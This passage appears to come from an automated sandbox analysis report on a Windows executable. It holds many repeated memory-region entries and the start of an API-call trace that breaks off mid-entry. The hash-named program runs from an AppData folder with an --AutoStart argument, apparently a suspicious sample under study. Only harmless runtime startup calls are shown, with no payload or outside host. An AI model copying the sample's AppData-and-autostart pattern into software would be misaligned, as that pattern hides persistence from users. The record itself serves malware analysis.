id = 2770 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2771 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2772 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2773 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2774 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2775 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2776 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2777 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2778 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2779 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2780 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2781 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2782 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2783 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2784 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2785 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2786 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2787 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2788 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2789 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2790 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2791 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2792 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2793 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2794 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2795 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2796 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2797 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2798 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2799 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2800 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2801 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2802 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2803 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2804 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2805 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2806 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2807 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2808 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2809 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2810 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2811 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2812 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2813 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2814 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2815 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2816 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2817 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2818 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2819 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2820 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2821 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2822 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2823 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2824 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2825 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2826 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2827 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2828 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2829 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2830 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2831 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2832 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2833 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2834 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2835 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2836 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2837 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2838 start_va = 0x2ed0000 end_va = 0x2f8ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 2839 start_va = 0x2fc0000 end_va = 0x2ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002fc0000" filename = "" Region: id = 2840 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2841 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2842 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2843 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2844 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2845 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2846 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2847 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2848 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2849 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2850 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2851 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2852 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2853 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2854 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2855 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2856 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2857 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2858 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2859 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2860 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2861 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2862 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2863 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2864 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2865 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2866 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2867 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2868 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2869 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2870 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2871 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2872 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2873 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2874 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2875 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2876 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2877 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2878 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2879 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2880 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2881 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2882 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2883 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2884 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2885 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2886 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2887 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2888 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2889 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2890 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2891 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2892 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2893 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2894 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2895 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2896 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2897 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2898 start_va = 0x2040000 end_va = 0x2065fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Thread: id = 118 os_tid = 0x7dc [0167.383] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff78 | out: lpSystemTimeAsFileTime=0x18ff78*(dwLowDateTime=0xdd125820, dwHighDateTime=0x1d8a8ba)) [0167.383] GetCurrentThreadId () returned 0x7dc [0167.383] GetCurrentProcessId () returned 0x7d8 [0167.383] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff70 | out: lpPerformanceCount=0x18ff70*=1622804976757) returned 1 [0167.409] GetStartupInfoW (in: lpStartupInfo=0x18ff08 | out: lpStartupInfo=0x18ff08*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\kEecfMwgj\\AppData\\Local\\11c63de0-7744-463b-80d8-a375eb15d14b\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x7747fd35, hStdError=0x774e7daf)) [0167.445] GetProcessHeap () returned 0x6a0000 [0167.495] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76680000 [0167.495] GetProcAddress (hModule=0x76680000, lpProcName="FlsAlloc") returned 0x76694ee3 [0167.495] GetProcAddress (hModule=0x76680000, lpProcName="FlsFree") returned 0x7669354f [0167.495] GetProcAddress (hModule=0x76680000, lpProcName="FlsGetValue") returned 0x76691252 [0167.495] GetProcAddress (hModule=0x76680000, lpProcName="FlsSetValue") returned 0x766941c0 [0167.495] GetProcAddress (hModule=0x76680000, lpProcName="InitializeCriticalSectionEx") returned 0x76694ce0 [0167.496] GetProcAddress (hModule=0x76680000, lpProcName="CreateEventExW") returned 0x767146ab [0167.496] GetProcAddress (hModule=0x76680000, lpProcName="CreateSemaphoreExW") returned 0x76714735 [0167.496] GetProcAddress (hModule=0x76680000, lpProcName="SetThreadStackGuarantee") returned 0x7669d2d7 [0167.496] GetProcAddress (hModule=0x76680000, lpProcName="CreateThreadpoolTimer") returned 0x766aee4e [0167.496] GetProcAddress (hModule=0x76680000, lpProcName="SetThreadpoolTimer") returned 0x774a441c [0167.496] GetProcAddress (hModule=0x76680000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x774cc50e [0167.496] GetProcAddress (hModule=0x76680000, lpProcName="CloseThreadpoolTimer") returned 0x774cc381 [0167.496] GetProcAddress (hModule=0x76680000, lpProcName="CreateThreadpoolWait") returned 0x766af058 [0167.496] GetProcAddress (hModule=0x76680000, lpProcName="SetThreadpoolWait") returned 0x774b05d7 [0167.496] GetProcAddress (hModule=0x76680000, lpProcName="CloseThreadpoolWait") returned 0x774cca24 [0167.497] GetProcAddress (hModule=0x76680000, lpProcName="FlushProcessWriteBuffers") returned 0x77480b8c [0167.497] GetProcAddress (hModule=0x76680000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x7753fde8 [0167.497] GetProcAddress (hModule=0x76680000, lpProcName="GetCurrentProcessorNumber") returned 0x774d1e1d [0167.497] GetProcAddress (hModule=0x76680000, lpProcName="GetLogicalProcessorInformation") returned 0x76714d01 [0167.497] GetProcAddress (hModule=0x76680000, lpProcName="CreateSymbolicLinkW") returned 0x7670d181 [0167.497] GetProcAddress (hModule=0x76680000, lpProcName="SetDefaultDllDirectories") returned 0x76ac208a [0167.497] GetProcAddress (hModule=0x76680000, lpProcName="EnumSystemLocalesEx") returned 0x767147ef [0167.497] GetProcAddress (hModule=0x76680000, lpProcName="CompareStringEx") returned 0x76714c51 [0167.498] GetProcAddress (hModule=0x76680000, lpProcName="GetDateFormatEx") returned 0x76726c26 [0167.498] GetProcAddress (hModule=0x76680000, lpProcName="GetLocaleInfoEx") returned 0x76714cf1 [0167.498] GetProcAddress (hModule=0x76680000, lpProcName="GetTimeFormatEx") returned 0x76726ba1 [0167.498] GetProcAddress (hModule=0x76680000, lpProcName="GetUserDefaultLocaleName") returned 0x76714d61 [0167.498] GetProcAddress (hModule=0x76680000, lpProcName="IsValidLocaleName") returned 0x76714d81 [0167.498] GetProcAddress (hModule=0x76680000, lpProcName="LCMapStringEx") returned 0x76714d91 [0167.498] GetProcAddress (hModule=0x76680000, lpProcName="GetCurrentPackageId") returned 0x0 [0167.498] GetProcAddress (hModule=0x76680000, lpProcName="GetTickCount64") returned 0x766aeeb0 [0167.498] GetProcAddress (hModule=0x76680000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0167.498] GetProcAddress (hModule=0x76680000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0167.500] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x3bc) returned 0x6bf4a8 [0167.500] GetCurrentThreadId () returned 0x7dc [0167.512] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x6b1e90 [0167.512] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x800) returned 0x6bf870 [0167.513] GetStartupInfoW (in: lpStartupInfo=0x18fed8 | out: lpStartupInfo=0x18fed8*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\kEecfMwgj\\AppData\\Local\\11c63de0-7744-463b-80d8-a375eb15d14b\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x425128, hStdOutput=0x351f919e, hStdError=0x0)) [0167.513] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0167.513] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0167.513] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0167.513] GetCommandLineW () returned="\"C:\\Users\\kEecfMwgj\\AppData\\Local\\11c63de0-7744-463b-80d8-a375eb15d14b\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe\" --AutoStart" [0167.513] GetEnvironmentStringsW () returned 0x6c0078* [0167.513] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb46) returned 0x6c0bc8 [0167.525] FreeEnvironmentStringsW (penv=0x6c0078) returned 1 [0167.538] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x511130, nSize=0x104 | out: lpFilename="C:\\Users\\kEecfMwgj\\AppData\\Local\\11c63de0-7744-463b-80d8-a375eb15d14b\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\11c63de0-7744-463b-80d8-a375eb15d14b\\12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b.exe")) returned 0x8a [0167.538] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x13a) returned 0x6c1718 [0167.538] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x9c) returned 0x6c1860 [0167.538] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x3e) returned 0x6b24b0 [0167.538] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x56) returned 0x6c1908 [0167.538] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x6e) returned 0x6c1968 [0167.538] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x78) returned 0x6afd50 [0167.538] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x62) returned 0x6c19e0 [0167.538] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x30) returned 0x6bb568 [0167.538] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x48) returned 0x6b7080 [0167.538] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x28) returned 0x6baf60 [0167.538] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x1a) returned 0x6bed60 [0167.538] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x34) returned 0x6b1eb0 [0167.538] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x5c) returned 0x6c1a50 [0167.538] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x32) returned 0x6c1ab8 [0167.538] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x2e) returned 0x6bb5a0 [0167.538] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x1c) returned 0x6bed88 [0167.538] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x12a) returned 0x6c1af8 [0167.538] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x7c) returned 0x6c1c30 [0167.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x36) returned 0x6c1cb8 [0167.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x3a) returned 0x6b24f8 [0167.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x90) returned 0x6c1cf8 [0167.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x24) returned 0x6baf90 [0167.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x30) returned 0x6bb5d8 [0167.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x36) returned 0x6c1d90 [0167.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x48) returned 0x6b70d0 [0167.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x52) returned 0x6c1dd0 [0167.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x3c) returned 0x6b2540 [0167.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0xd6) returned 0x6c1e30 [0167.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x2e) returned 0x6bb610 [0167.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x28) returned 0x6bafc0 [0167.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x1e) returned 0x6bedb0 [0167.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x2c) returned 0x6bb648 [0167.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x54) returned 0x6c1f10 [0167.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x52) returned 0x6c1f70 [0167.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x2c) returned 0x6bb680 [0167.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x26) returned 0x6baff0 [0167.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x8, Size=0x3e) returned 